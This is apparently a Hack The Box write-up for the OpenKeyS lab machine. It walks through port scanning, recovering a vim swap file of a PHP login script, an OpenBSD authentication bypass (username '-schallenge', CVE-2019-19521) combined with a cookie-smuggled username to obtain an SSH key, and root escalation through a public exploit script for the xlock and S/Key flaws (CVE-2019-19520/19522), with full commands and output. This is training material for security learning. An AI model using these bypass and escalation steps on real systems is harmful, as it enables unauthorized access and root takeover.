I"0ú<blockquote>
  <p>OpenKeyS gives us good insight and exposure on OpenBSD vulnerabilities, initial web enumeration leads us to a directory where we find a vim swap file, restoring the file contents we understand certain aspects on how authentication works for the login form. Next we use it with CVE-2019-19521 to reform and execute authentication bypass attack to retrieve a valid user‚Äôs SSH key. For elevating privileges to root we exploit vulnerabilities out of CVE-2019-19520 and CVE-2019-19522, first by exploiting xlock we gain access to auth group and then abuse S/Key authentication to gain root shell.</p>
</blockquote>

<h2 id="reconnaissance">Reconnaissance</h2>

<h4 id="masscan--nmap">masscan &amp; nmap</h4>

<p>Starting off with <code class="language-plaintext highlighter-rouge">masscan</code> &amp; <code class="language-plaintext highlighter-rouge">nmap</code> we discover two open TCP ports 22,80:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/openkeys
‚Üí masscan <span class="nt">-e</span> tun0 <span class="nt">-p1-65535</span> <span class="nt">--rate</span> 500 10.10.10.199 | <span class="nb">tee </span>masscan.ports

Starting masscan 1.0.5 <span class="o">(</span>http://bit.ly/14GZzcT<span class="o">)</span> at 2020-11-28 12:52:46 GMT
 <span class="nt">--</span> forced options: <span class="nt">-sS</span> <span class="nt">-Pn</span> <span class="nt">-n</span> <span class="nt">--randomize-hosts</span> <span class="nt">-v</span> <span class="nt">--send-eth</span>
Initiating SYN Stealth Scan
Scanning 1 hosts <span class="o">[</span>65535 ports/host]
Discovered open port 80/tcp on 10.10.10.199
Discovered open port 22/tcp on 10.10.10.199

cfx:  ~/Documents/htb/openkeys
‚Üí nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-p22</span>,80 10.10.10.199
Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2020-11-28 18:27 IST
Nmap scan report <span class="k">for </span>10.10.10.199
Host is up <span class="o">(</span>0.093s latency<span class="o">)</span><span class="nb">.</span>

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.1 <span class="o">(</span>protocol 2.0<span class="o">)</span>
| ssh-hostkey:
|   3072 5e:ff:81:e9:1f:9b:f8:9a:25:df:5d:82:1a:dd:7a:81 <span class="o">(</span>RSA<span class="o">)</span>
|   256 64:7a:5a:52:85:c5:6d:d5:4a:6b:a7:1a:9a:8a:b9:bb <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 12:35:4b:6e:23:09:dc:ea:00:8c:72:20:c7:50:32:f3 <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  http    OpenBSD httpd
|_http-title: Site doesn<span class="s1">'t have a title (text/html).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.84 seconds
</span></pre></td></tr></tbody></table></code></pre></div></div>

<p>Banner grabbing on Port 80 from nmap doesn‚Äôt give us anything interesting.</p>

<h3 id="port-80-http">Port 80: HTTP</h3>

<p>Visiting the <a href="http://10.10.10.199">http://10.10.10.199</a> we get redirected to index.php which presents a login page:</p>

<p><img src="/assets/img/Posts/OpenKeys/website.png" alt="website" /></p>

<p>Apart from website title which says <code class="language-plaintext highlighter-rouge">OpenKeyS - Retrieve your OpenSSH Keys</code> and a <code class="language-plaintext highlighter-rouge">Forget?</code> link which is non functional we don‚Äôt see anything useful.</p>

<p>On trying random creds and some basic SQL injection queries we get <code class="language-plaintext highlighter-rouge">Authentication denied.</code> message.</p>

<h4 id="directory-fuzzing">Directory Fuzzing</h4>

<p>Using <code class="language-plaintext highlighter-rouge">ffuf</code> to discover hidden files and directories:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/openkeys
‚Üí ffuf <span class="nt">-c</span> <span class="nt">-r</span> <span class="nt">-u</span> http://10.10.10.199/FUZZ <span class="nt">-w</span> /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt <span class="nt">-e</span> .txt,.php <span class="nt">-fc</span> 403

        /<span class="s1">'___\  /'</span>___<span class="se">\ </span>          /<span class="s1">'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.0.2
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.199/FUZZ
 :: Extensions       : .txt .php
 :: Follow redirects : true
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
 :: Filter           : Response status: 403
________________________________________________

js                      [Status: 200, Size: 582, Words: 156, Lines: 22]
images                  [Status: 200, Size: 589, Words: 160, Lines: 22]
includes                [Status: 200, Size: 711, Words: 211, Lines: 23]
css                     [Status: 200, Size: 697, Words: 215, Lines: 23]
index.php               [Status: 200, Size: 4837, Words: 110, Lines: 102]
fonts                   [Status: 200, Size: 1066, Words: 385, Lines: 26]
vendor                  [Status: 200, Size: 1522, Words: 635, Lines: 30]
:: Progress: [60348/60348] :: Job [1/1] :: 384 req/sec :: Duration: [0:02:37] :: Errors: 0 ::
</span></pre></td></tr></tbody></table></code></pre></div></div>

<h4 id="include-directory">include directory</h4>

<p>Moving ahead with directory fuzzing we find <code class="language-plaintext highlighter-rouge">includes</code> directory, inside the directory we find two files <code class="language-plaintext highlighter-rouge">auth.php</code> and <code class="language-plaintext highlighter-rouge">auth.php.swp</code> :</p>

<p><img src="/assets/img/Posts/OpenKeys/includes.png" alt="includes" /></p>

<p>For further investing, we‚Äôll download both the files using <code class="language-plaintext highlighter-rouge">wget</code> and look into it.</p>

<h3 id="file-recovery">File recovery</h3>

<p>It appears <code class="language-plaintext highlighter-rouge">auth.php</code> is empty however <code class="language-plaintext highlighter-rouge">auth.php.swp</code> looking like a vim swap file, Using strings we were able to confirm it‚Äôs a vim swap file, along with it we also a potential username <code class="language-plaintext highlighter-rouge">jennifer</code> and the full path of auth.php which is <code class="language-plaintext highlighter-rouge">/var/www/htdocs/includes/auth.php</code>:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/openkeys
‚Üí strings auth.php.swp
b0VIM 8.1
jennifer
openkeys.htb
/var/www/htdocs/includes/auth.php
3210
<span class="c">#"!</span>
<span class="o">[</span>..SNIP.]
</pre></td></tr></tbody></table></code></pre></div></div>

<p>We can restore the file using <code class="language-plaintext highlighter-rouge">vim -r auth.php.swp</code>, save it‚Äôs contents in a new file using <code class="language-plaintext highlighter-rouge">w: recoverauth.php</code></p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/openkeys
‚Üí cat recoverauth.php
<span class="cp">&lt;?php</span>

<span class="k">function</span> <span class="n">authenticate</span><span class="p">(</span><span class="nv">$username</span><span class="p">,</span> <span class="nv">$password</span><span class="p">)</span>
<span class="p">{</span>
    <span class="nv">$cmd</span> <span class="o">=</span> <span class="nb">escapeshellcmd</span><span class="p">(</span><span class="s2">"../auth_helpers/check_auth "</span> <span class="mf">.</span> <span class="nv">$username</span> <span class="mf">.</span> <span class="s2">" "</span> <span class="mf">.</span> <span class="nv">$password</span><span class="p">);</span>
    <span class="nb">system</span><span class="p">(</span><span class="nv">$cmd</span><span class="p">,</span> <span class="nv">$retcode</span><span class="p">);</span>
    <span class="k">return</span> <span class="nv">$retcode</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">function</span> <span class="n">is_active_session</span><span class="p">()</span>
<span class="p">{</span>
    <span class="c1">// Session timeout in seconds</span>
    <span class="nv">$session_timeout</span> <span class="o">=</span> <span class="mi">300</span><span class="p">;</span>

    <span class="c1">// Start the session</span>
    <span class="nb">session_start</span><span class="p">();</span>

    <span class="c1">// Is the user logged in?</span>
    <span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"logged_in"</span><span class="p">]))</span>
    <span class="p">{</span>
        <span class="c1">// Has the session expired?</span>
        <span class="nv">$time</span> <span class="o">=</span> <span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">'REQUEST_TIME'</span><span class="p">];</span>
        <span class="k">if</span> <span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'last_activity'</span><span class="p">])</span> <span class="o">&amp;&amp;</span>
            <span class="p">(</span><span class="nv">$time</span> <span class="o">-</span> <span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'last_activity'</span><span class="p">])</span> <span class="o">&gt;</span> <span class="nv">$session_timeout</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="nf">close_session</span><span class="p">();</span>
            <span class="k">return</span> <span class="kc">False</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="k">else</span>
        <span class="p">{</span>
            <span class="c1">// Session is active, update last activity time and return True</span>
            <span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'last_activity'</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$time</span><span class="p">;</span>
            <span class="k">return</span> <span class="kc">True</span><span class="p">;</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="k">else</span>
    <span class="p">{</span>
        <span class="k">return</span> <span class="kc">False</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="k">function</span> <span class="n">init_session</span><span class="p">()</span>
<span class="p">{</span>
    <span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"logged_in"</span><span class="p">]</span> <span class="o">=</span> <span class="kc">True</span><span class="p">;</span>
    <span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"login_time"</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">'REQUEST_TIME'</span><span class="p">];</span>
    <span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"last_activity"</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">'REQUEST_TIME'</span><span class="p">];</span>
    <span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"remote_addr"</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">'REMOTE_ADDR'</span><span class="p">];</span>
    <span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"user_agent"</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">'HTTP_USER_AGENT'</span><span class="p">];</span>
    <span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"username"</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$_REQUEST</span><span class="p">[</span><span class="s1">'username'</span><span class="p">];</span>
<span class="p">}</span>

<span class="k">function</span> <span class="n">close_session</span><span class="p">()</span>
<span class="p">{</span>
    <span class="nb">session_unset</span><span class="p">();</span>
    <span class="nb">session_destroy</span><span class="p">();</span>
    <span class="nb">session_start</span><span class="p">();</span>
<span class="p">}</span>


<span class="cp">?&gt;</span>
</pre></td></tr></tbody></table></code></pre></div></div>
<h2 id="shell-as-jennifer">Shell as jennifer</h2>

<h3 id="source-code-analysis">Source Code Analysis</h3>

<p>Looking at the <code class="language-plaintext highlighter-rouge">authenticate()</code> function we see it‚Äôs using <code class="language-plaintext highlighter-rouge">escapeshellcmd</code> which denies the possibility of command injection.</p>

<blockquote>
  <table>
    <tbody>
      <tr>
        <td>escapeshellcmd() escapes any characters in a string that might be used to trick a shell command into executing arbitrary commands. This function should be used to make sure that any data coming from user input is escaped before this data is passed to the exec() or system() functions, or to the backtick operator. Following characters are preceded by a backslash: &amp;#;`</td>
        <td>*?~&lt;&gt;^()[]{}$\, \x0A and \xFF. ‚Äò and ‚Äú are escaped only if they are not paired. On Windows, all these characters plus % and ! are preceded by a caret (^).</td>
      </tr>
    </tbody>
  </table>
</blockquote>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td> --><td class="rouge-code"><pre><span class="k">function</span> <span class="n">authenticate</span><span class="p">(</span><span class="nv">$username</span><span class="p">,</span> <span class="nv">$password</span><span class="p">)</span>
<span class="p">{</span>
    <span class="nv">$cmd</span> <span class="o">=</span> <span class="nb">escapeshellcmd</span><span class="p">(</span><span class="s2">"../auth_helpers/check_auth "</span> <span class="mf">.</span> <span class="nv">$username</span> <span class="mf">.</span> <span class="s2">" "</span> <span class="mf">.</span> <span class="nv">$password</span><span class="p">);</span>
    <span class="nb">system</span><span class="p">(</span><span class="nv">$cmd</span><span class="p">,</span> <span class="nv">$retcode</span><span class="p">);</span>
    <span class="k">return</span> <span class="nv">$retcode</span><span class="p">;</span>
<span class="p">}</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>But we do see it‚Äôs using <code class="language-plaintext highlighter-rouge">check_auth</code> file, we can download that file using <code class="language-plaintext highlighter-rouge">wget http://10.10.10.199/auth_helpers/check_auth</code> and take a look into it:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/openkeys
‚Üí file check_auth
check_auth: ELF 64-bit LSB shared object, x86-64, version 1 <span class="o">(</span>SYSV<span class="o">)</span>, dynamically linked, interpreter /usr/libexec/ld.so, <span class="k">for </span>OpenBSD, not stripped
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Analysing the binary using radare &amp; ghidra didn‚Äôt help much, but using <code class="language-plaintext highlighter-rouge">strings</code> does reveal certain things like <code class="language-plaintext highlighter-rouge">auth_userokay</code>:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/openkeys
‚Üí strings check_auth
/usr/libexec/ld.so
OpenBSD
libc.so.95.1
_csu_finish
<span class="nb">exit
</span>_Jv_RegisterClasses
atexit
auth_userokay
_end
AWAVAUATSH
t-E1
t7E1
ASAWAVAT
<span class="o">[</span>..SNIP..]
atexit
_GLOBAL_OFFSET_TABLE_
auth_userokay
_end
_DYNAMIC
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Quick google search on <code class="language-plaintext highlighter-rouge">auth_userokay</code> shows [<strong>OpenBSD man page</strong>] where we look at what it‚Äôs used for.</p>

<blockquote>
  <p>The auth_userokay() function provides a single function call interface. Provided with a user‚Äôs name in name, and an optional style, type, and password, the auth_userokay() function returns a simple yes/no response. A return value of 0 implies failure; a non-zero return value implies success. If style is not NULL, it specifies the desired style of authentication to be used. If it is NULL then the default style for the user is used.</p>
</blockquote>

<h3 id="cve-2019-19521">CVE-2019-19521</h3>

<h4 id="bypass-the-openbsd-authentication">Bypass the OpenBSD authentication</h4>

<p>On searching for OpenBSD authentication vulnerability we come across this <a href="https://www.secpod.com/blog/openbsd-authentication-bypass-and-local-privilege-escalation-vulnerabilities/"><strong>article</strong></a> where it showcase multiple CVE‚Äôs on OpenBSD, one of them is authentication Bypass vulnerability.</p>

<p>The authentication bypass vulnerability automatically waves through anyone accessing via the password option with the username
-schallenge, because the hyphen forces the operating system to interpret the word as a command line option for the program performing the authentication. The -schallenge option automatically grants the user access.</p>

<p>We can confirm this vulnerability by trying username as <code class="language-plaintext highlighter-rouge">-schallenge</code> and password <code class="language-plaintext highlighter-rouge">cfx</code> which authenticates us as user <code class="language-plaintext highlighter-rouge">-schallenge</code>. Looking at the output on successful login, it says <code class="language-plaintext highlighter-rouge">OpenSSH key not found for user -schallenge</code>.</p>

<p>Even though we can bypass the authentication it‚Äôs not much useful as of now as we need to login as a valid user and then retrieve it‚Äôs SSH key. Now the limitation of this vulnerability is that the username is fixed, so we need find a way to smuggle a valid username via logging in.</p>

<h3 id="openssh-key---jennifer">OpenSSH key - jennifer</h3>

<p>Turns out we can smuggle a valid username, looking at the <code class="language-plaintext highlighter-rouge">init_session()</code> function from the source code reveals that the username is being accepted from the php <code class="language-plaintext highlighter-rouge">$_REQUEST</code> array.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td> --><td class="rouge-code"><pre><span class="k">function </span>init_session<span class="o">()</span>
<span class="o">{</span>
    <span class="nv">$_SESSION</span><span class="o">[</span><span class="s2">"logged_in"</span><span class="o">]</span> <span class="o">=</span> True<span class="p">;</span>
    <span class="nv">$_SESSION</span><span class="o">[</span><span class="s2">"login_time"</span><span class="o">]</span> <span class="o">=</span> <span class="nv">$_SERVER</span><span class="o">[</span><span class="s1">'REQUEST_TIME'</span><span class="o">]</span><span class="p">;</span>
    <span class="nv">$_SESSION</span><span class="o">[</span><span class="s2">"last_activity"</span><span class="o">]</span> <span class="o">=</span> <span class="nv">$_SERVER</span><span class="o">[</span><span class="s1">'REQUEST_TIME'</span><span class="o">]</span><span class="p">;</span>
    <span class="nv">$_SESSION</span><span class="o">[</span><span class="s2">"remote_addr"</span><span class="o">]</span> <span class="o">=</span> <span class="nv">$_SERVER</span><span class="o">[</span><span class="s1">'REMOTE_ADDR'</span><span class="o">]</span><span class="p">;</span>
    <span class="nv">$_SESSION</span><span class="o">[</span><span class="s2">"user_agent"</span><span class="o">]</span> <span class="o">=</span> <span class="nv">$_SERVER</span><span class="o">[</span><span class="s1">'HTTP_USER_AGENT'</span><span class="o">]</span><span class="p">;</span>
    <span class="nv">$_SESSION</span><span class="o">[</span><span class="s2">"username"</span><span class="o">]</span> <span class="o">=</span> <span class="nv">$_REQUEST</span><span class="o">[</span><span class="s1">'username'</span><span class="o">]</span><span class="p">;</span>
<span class="o">}</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Looking a PHP <a href="https://www.php.net/manual/en/reserved.variables.request.php"><strong>documentation</strong></a> on <code class="language-plaintext highlighter-rouge">$_REQUEST</code></p>

<blockquote>
  <p>An associative array that by default contains the contents of $_GET, $_POST and $_COOKIE</p>
</blockquote>

<p>It means we can smuggle our username inside cookie parameter as well, So next we‚Äôll intercept a login request and try inserting username <code class="language-plaintext highlighter-rouge">jennifer</code> inside cookie which we saw in the strings output of vim swap file.</p>

<p>Step 1: First we intercept the login POST request and send username in the cookie:</p>

<p><img src="/assets/img/Posts/OpenKeys/s1.png" alt="s1" /></p>

<p>Step 2: On forwarding the request we get redirected to <code class="language-plaintext highlighter-rouge">sshkey.php</code> and inside browser we see SSH key for <code class="language-plaintext highlighter-rouge">jennifer</code></p>

<p><img src="/assets/img/Posts/OpenKeys/s2.png" alt="s2" /></p>

<p><img src="/assets/img/Posts/OpenKeys/s3.png" alt="s3" /></p>

<h4 id="ssh---jennifer">SSH - jennifer</h4>

<p>We‚Äôll copy the key in a file and <code class="language-plaintext highlighter-rouge">chmod 600</code> the file, now we can use it SSH as jennifer:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/openkeys
‚Üí ssh <span class="nt">-i</span> jennifer.key jennifer@10.10.10.199
Last login: Wed Jun 24 09:31:16 2020 from 10.10.14.2
OpenBSD 6.6 <span class="o">(</span>GENERIC<span class="o">)</span> <span class="c">#353: Sat Oct 12 10:45:56 MDT 2019</span>

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug<span class="o">(</span>1<span class="o">)</span> utility to report bugs <span class="k">in </span>the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code.  With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and <span class="k">if </span>a
known fix <span class="k">for </span>it exists, include that as well.

openkeys<span class="nv">$ </span><span class="nb">whoami
</span>jennifer
openkeys<span class="nv">$ </span><span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>1001<span class="o">(</span>jennifer<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1001<span class="o">(</span>jennifer<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1001<span class="o">(</span>jennifer<span class="o">)</span>, 0<span class="o">(</span>wheel<span class="o">)</span>
openkeys<span class="nv">$ </span><span class="nb">uname</span> <span class="nt">-a</span>
OpenBSD openkeys.htb 6.6 GENERIC#353 amd64
</pre></td></tr></tbody></table></code></pre></div></div>

<h4 id="grabbing-usertxt">Grabbing user.txt</h4>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre>openkeys<span class="nv">$ </span><span class="nb">cat </span>user.txt
36ab21239a15c53<span class="k">*****************</span>

</pre></td></tr></tbody></table></code></pre></div></div>

<h2 id="elevating-priv-jennifer---root">Elevating Priv: jennifer -&gt; root</h2>

<p>Going back to <a href="https://www.secpod.com/blog/openbsd-authentication-bypass-and-local-privilege-escalation-vulnerabilities/"><strong>secpod article</strong></a>, apart from authentication bypass there were three more CVE‚Äôs for local privilege escalation.</p>

<ul>
  <li>CVE-2019-19519 : Local privilege escalation via su</li>
  <li>CVE-2019-19520 : Local privilege escalation via xlock</li>
  <li>CVE-2019-19522 : Local privilege escalation via S/Key and YubiKey</li>
</ul>

<p>While first one doesn‚Äôt seem to apply here, the second and third are worth looking at.</p>

<p>In CVE-2019-19520, xlock in OpenBSD 6.6 allows local users to gain the privileges of the auth group.</p>

<p>Gaining privileges of auth group using CVE-2019-19520 we can leverage CVE-2019-19522 where any local user with ‚Äòauth‚Äô group permission can gain full privileges of the root user due to incorrect operation of authorization mechanisms via ‚ÄòS/Key‚Äò and ‚ÄòYubiKey‚Äò.</p>

<h3 id="autoexploit">AutoExploit</h3>

<p>There is a <a href="https://github.com/bcoles/local-exploits/blob/master/CVE-2019-19520/openbsd-authroot"><strong>script on Github</strong></a> which automates both the CVE‚Äôs to give us root.</p>

<p>We‚Äôll download it and transfer it to the box using scp since we‚Äôve SSH access:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/openkeys
‚Üí scp <span class="nt">-i</span> jennifer.key openbsd-authroot jennifer@10.10.10.199:/tmp
openbsd-authroot                                                                                                                                            100% 4087    11.3KB/s   00:00
</pre></td></tr></tbody></table></code></pre></div></div>

<h4 id="root-shell">Root Shell</h4>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
</pre></td> --><td class="rouge-code"><pre>openkeys<span class="nv">$ </span><span class="nb">cd</span> /tmp/
openkeys<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span>
total 16
drwxrwxrwt   2 root      wheel   512 Nov 28 13:55 <span class="nb">.</span>
drwxr-xr-x  13 root      wheel   512 Nov 28 13:45 ..
<span class="nt">-rw-r--r--</span>   1 jennifer  wheel  4087 Nov 28 13:55 openbsd-authroot
openkeys<span class="nv">$ </span><span class="nb">chmod</span> +x openbsd-authroot

openkeys<span class="nv">$ </span>./openbsd-authroot
openbsd-authroot <span class="o">(</span>CVE-2019-19520 / CVE-2019-19522<span class="o">)</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> checking system ...
<span class="o">[</span><span class="k">*</span><span class="o">]</span> system supports S/Key authentication
<span class="o">[</span><span class="k">*</span><span class="o">]</span> <span class="nb">id</span>: <span class="nv">uid</span><span class="o">=</span>1001<span class="o">(</span>jennifer<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1001<span class="o">(</span>jennifer<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1001<span class="o">(</span>jennifer<span class="o">)</span>, 0<span class="o">(</span>wheel<span class="o">)</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> compiling ...
<span class="o">[</span><span class="k">*</span><span class="o">]</span> running Xvfb ...
<span class="o">[</span><span class="k">*</span><span class="o">]</span> testing <span class="k">for </span>CVE-2019-19520 ...
_XSERVTransmkdir: Owner of /tmp/.X11-unix should be <span class="nb">set </span>to root
<span class="o">[</span>+] success! we have auth group permissions

WARNING: THIS EXPLOIT WILL DELETE KEYS. YOU HAVE 5 SECONDS TO CANCEL <span class="o">(</span>CTRL+C<span class="o">)</span><span class="nb">.</span>

<span class="o">[</span><span class="k">*</span><span class="o">]</span> trying CVE-2019-19522 <span class="o">(</span>S/Key<span class="o">)</span> ...
Your password is: EGG LARD GROW HOG DRAG LAIN
otp-md5 99 obsd91335
S/Key Password:
openkeys# <span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>wheel<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>wheel<span class="o">)</span>, 2<span class="o">(</span>kmem<span class="o">)</span>, 3<span class="o">(</span>sys<span class="o">)</span>, 4<span class="o">(</span><span class="nb">tty</span><span class="o">)</span>, 5<span class="o">(</span>operator<span class="o">)</span>, 20<span class="o">(</span>staff<span class="o">)</span>, 31<span class="o">(</span>guest<span class="o">)</span>
openkeys# <span class="nb">ls</span>
.Xdefaults  .composer   .cshrc      .cvsrc      .forward    .login      .profile    .ssh        .viminfo    dead.letter root.txt
openkeys# <span class="nb">whoami
</span>root
</pre></td></tr></tbody></table></code></pre></div></div>

<h4 id="grabbing-roottxt">Grabbing root.txt</h4>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre>openkeys# <span class="nb">cat </span>root.txt
f3a553b1697050<span class="k">******************</span>

</pre></td></tr></tbody></table></code></pre></div></div>

<h3 id="manual-exploitation-cve-2019-19520">Manual Exploitation CVE-2019-19520</h3>

<p>The vulnerability was originally discovered by Qualys research team and we‚Äôll use their <a href="https://www.qualys.com/2019/12/04/cve-2019-19521/authentication-vulnerabilities-openbsd.txt"><strong>Advisory</strong></a> to exploit it manually.</p>

<blockquote>
  <p>xlock utility is used to lock the X server till the user enters the password at the keyboard. On OpenBSD, /usr/X11R6/bin/xlock is installed by default and has set-group-ID of ‚Äòauth‚Äò, but without ‚Äòset-user-ID‚Äô. ‚Äòset user ID‚Äô and ‚Äòset group ID‚Äô are Unix access rights flags that allow users to run an executable with the permissions of the executable‚Äôs owner or group respectively.</p>
</blockquote>

<p>The vulnerability exists within the xlock utility in OpenBSD within ‚Äòxenocara/lib/mesa/src/loader/loader.c‚Äô which mishandles dlopen function.</p>

<blockquote>
  <p>On OpenBSD, /usr/X11R6/bin/xlock is installed by default and is set-group-ID ‚Äúauth‚Äù, not set-user-ID; the following check is therefore incomplete and should use issetugid() instead:</p>
</blockquote>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre></td> --><td class="rouge-code"><pre>101 _X_HIDDEN void <span class="k">*</span>
102 driOpenDriver<span class="o">(</span>const char <span class="k">*</span>driverName<span class="o">)</span>
103 <span class="o">{</span>
...
113    <span class="k">if</span> <span class="o">(</span>geteuid<span class="o">()</span> <span class="o">==</span> getuid<span class="o">())</span> <span class="o">{</span>
114       /<span class="k">*</span> don<span class="s1">'t allow setuid apps to use LIBGL_DRIVERS_PATH */
115       libPaths = getenv("LIBGL_DRIVERS_PATH");


openkeys$ which xlock | xargs ls -la
-rwxr-sr-x  1 root  auth  3138520 Oct 12  2019 /usr/X11R6/bin/xlock
</span></pre></td></tr></tbody></table></code></pre></div></div>

